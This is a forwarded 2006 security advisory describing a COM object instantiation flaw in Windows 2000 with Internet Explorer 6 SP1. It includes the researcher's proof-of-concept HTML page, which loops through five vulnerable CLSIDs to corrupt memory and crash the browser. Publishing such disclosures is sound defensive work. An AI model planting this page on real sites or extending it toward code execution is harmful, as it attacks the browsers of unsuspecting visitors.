Thread-topic: [NT] Windows 2000 Multiple COM Object Instantiation Vulnerability
> -----Original Message-----
> From: SecuriTeam [mailto:support@xxxxxxxxxxxxxx]
> Sent: Tuesday, August 22, 2006 7:46 PM
> To: html-list@xxxxxxxxxxxxxx
> Subject: [NT] Windows 2000 Multiple COM Object Instantiation
> Vulnerability
> - - - - - - - - -
>
>
>
> Windows 2000 Multiple COM Object Instantiation Vulnerability
>
>
>
> Multiple vulnerability has been found in Windows 2000, when
> Internet Explorer tries to instantiate the ciodm.dll,
> MyInfo.dll, msdxm.ocx, Creator.dll (Media player 9) COM
> object as an ActiveX control, it may corrupt system memory in
> such a way that an attacker may DoS and possibly could
> execute arbitrary code.
>
>
> Vulnerable Systems:
> * Windows 2000 with Internet Explorer 6.0 SP1
>
> Exploit:
> <!--
>
> // Windows 2000 Multiple COM Object Instantiation Vulnerability
> // tested on Windows 2000 SP4 CN
>
> //
> // nop (nop#xsec.org)
>
> --!>
> <html>
> <head>
> <title>COM-tester</title>
> </head>
> </body>
> <script>
> var i =0;
> var clsid = new Array(
>
> // NO: 1
> // CLSID: {3BC4F3A3-652A-11D1-B4D4-00C04FC2DB8D}
> // Info: Microsoft Index Server Catalog Administration Object
> // ProgID: Microsoft.ISCatAdm.1
> // InprocServer32: C:\WINNT\system32\ciodm.dll
> "{3BC4F3A3-652A-11D1-B4D4-00C04FC2DB8D}",
>
> // NO: 2
> // CLSID: {4682C82A-B2FF-11D0-95A8-00A0C92B77A9}
> // Info: MyInfo ASP Component// ProgID: MSWC.MyInfo.1
> // InprocServer32: C:\WINNT\system32\inetsrv\MyInfo.dll
> "{4682C82A-B2FF-11D0-95A8-00A0C92B77A9}",
>
>
> // NO: 3
> // CLSID: {8E71888A-423F-11D2-876E-00A0C9082467}
> // Info: RadioServer Class
> // ProgID: Mmedia.RadioServer.1
> // InprocServer32: C:\WINNT\system32\msdxm.ocx
> "{8E71888A-423F-11D2-876E-00A0C9082467}",
>
>
> // NO: 4 media player?
> // CLSID: {606EF130-9852-11D3-97C6-0060084856D4}
> // Info: CdCreator Class// ProgID: Creator.CdCreator.1
> // InprocServer32: C:\Program Files\Common Files\Adaptec
> Shared\CreatorAPI\creator.dll
> "{606EF130-9852-11D3-97C6-0060084856D4}",
>
> // NO: 5 media player?
> // CLSID: {F849164D-9863-11D3-97C6-0060084856D4}
> // Info: CdDevice Class// ProgID: Creator.CdDevice.1
> // InprocServer32: C:\Program Files\Common Files\Adaptec
> Shared\CreatorAPI\creator.dll
> "{F849164D-9863-11D3-97C6-0060084856D4}",
>
> // END
> null
> );
>
> while(clsid[i])
> {
> var a = document.createElement("object");
>
> window.status = "Testing Object " + clsid[i] + "...";
>
> a.setAttribute("classid", "clsid:" + clsid[i]);
>
> i++;
> }
>
> window.status = "failed!";
>
> </script>
> </body>
> </html>
>
>
> Additional Information:
> The information has been provided by nop <mailto:nop@xxxxxxxx> .
> The original article can be found at:
>
>
>
> ==============================================================
> ==================
>
>
>
>
>
> This bulletin is sent to members of the SecuriTeam mailing list.
> To unsubscribe from the list, send mail with an empty subject
> line and body to: html-list-unsubscribe@xxxxxxxxxxxxxx
> In order to subscribe to the mailing list and receive
> advisories in HTML format, simply forward this email to:
> html-list-subscribe@xxxxxxxxxxxxxx
>
>
>
> ==============================================================
> ==================
> ==============================================================
> ==================
>
> DISCLAIMER:
> The information in this bulletin is provided "AS IS" without
> warranty of any kind.
> In no event shall we be liable for any damages whatsoever
> including direct, indirect, incidental, consequential, loss
> of business profits or special damages.
>
>
>
>
>
>
